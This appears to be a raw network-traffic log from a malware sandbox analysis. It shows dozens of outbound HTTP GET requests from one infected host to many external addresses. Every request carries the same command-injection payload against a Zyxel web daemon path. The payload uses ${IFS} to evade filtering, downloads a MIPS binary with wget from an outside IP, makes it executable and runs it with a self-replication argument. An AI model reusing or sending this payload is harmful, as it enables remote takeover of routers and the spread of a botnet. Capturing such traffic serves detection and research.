                                            Feb 2, 2024 06:21:23.844106913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7244192.168.2.1541054159.151.255.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844129086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7245192.168.2.153278897.141.162.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844183922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7246192.168.2.1537982212.27.181.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844235897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7247192.168.2.154934250.109.179.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844295979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7248192.168.2.1548924206.68.75.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844321966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7249192.168.2.1556638195.46.175.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844372034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7250192.168.2.1544994153.8.24.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844412088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7251192.168.2.1551682166.170.252.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844465017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7252192.168.2.1556476132.182.148.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844502926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7253192.168.2.154477897.45.117.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844521999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7254192.168.2.1546072208.188.116.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844593048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7255192.168.2.1540304156.181.248.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844644070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7256192.168.2.154637053.8.19.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844677925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7257192.168.2.1555164219.32.81.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844713926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7258192.168.2.1552696195.25.121.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844759941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7259192.168.2.155965264.144.186.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844793081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7260192.168.2.154915038.230.95.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844840050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7261192.168.2.154206048.243.69.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844914913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7262192.168.2.1548768219.222.239.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844927073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7263192.168.2.1537738152.72.142.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844964981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7264192.168.2.1536866160.21.38.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844990015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7265192.168.2.153627049.62.130.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845033884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7266192.168.2.1553392200.209.87.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845052004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7267192.168.2.1560610128.244.234.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845103025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7268192.168.2.155852673.244.62.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845155001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7269192.168.2.1536468209.2.197.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845189095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7270192.168.2.1535180221.213.17.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845242023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7271192.168.2.1539022195.124.155.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845278978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7272192.168.2.1541516200.95.189.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845326900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7273192.168.2.1554536142.155.152.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845359087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7274192.168.2.1537892147.52.87.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845407009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7275192.168.2.1534260218.79.160.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845436096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7276192.168.2.1556320213.172.126.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845469952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7277192.168.2.1541028208.45.107.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845529079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7278192.168.2.154372831.174.84.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845572948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7279192.168.2.1555318109.93.121.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845612049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7280192.168.2.154750467.40.213.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845638990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7281192.168.2.1549840134.250.251.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845690012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7282192.168.2.1537866210.230.63.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845717907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7283192.168.2.1541342222.123.138.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845763922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7284192.168.2.153376244.72.241.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845818996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7285192.168.2.1546142111.132.228.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845856905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7286192.168.2.1548116180.127.53.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845904112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7287192.168.2.154448860.249.226.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845930099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7288192.168.2.1540630125.76.4.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.845973015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7289192.168.2.1542000160.140.65.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846003056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7290192.168.2.155795498.98.184.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846040010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7291192.168.2.153286296.165.189.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846052885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7292192.168.2.155375046.162.147.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846112013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7293192.168.2.1558862160.136.146.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846155882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7294192.168.2.1545342189.38.211.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846189022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7295192.168.2.153304878.64.106.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846216917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7296192.168.2.155308225.24.227.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846261024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7297192.168.2.1546720221.234.94.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846297979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7298192.168.2.154879232.122.58.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846330881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7299192.168.2.1535538186.186.144.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846370935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7300192.168.2.154962049.162.194.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846396923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7301192.168.2.154766075.120.19.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846447945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7302192.168.2.1539892159.208.124.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846503973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7303192.168.2.156023475.148.194.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846534967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7304192.168.2.1542028205.37.187.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846581936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7305192.168.2.1553990112.238.70.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846617937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7306192.168.2.1543358153.49.76.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846662998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7307192.168.2.1547674205.53.48.52443
                                            TimestampBytes transferredDirectionData
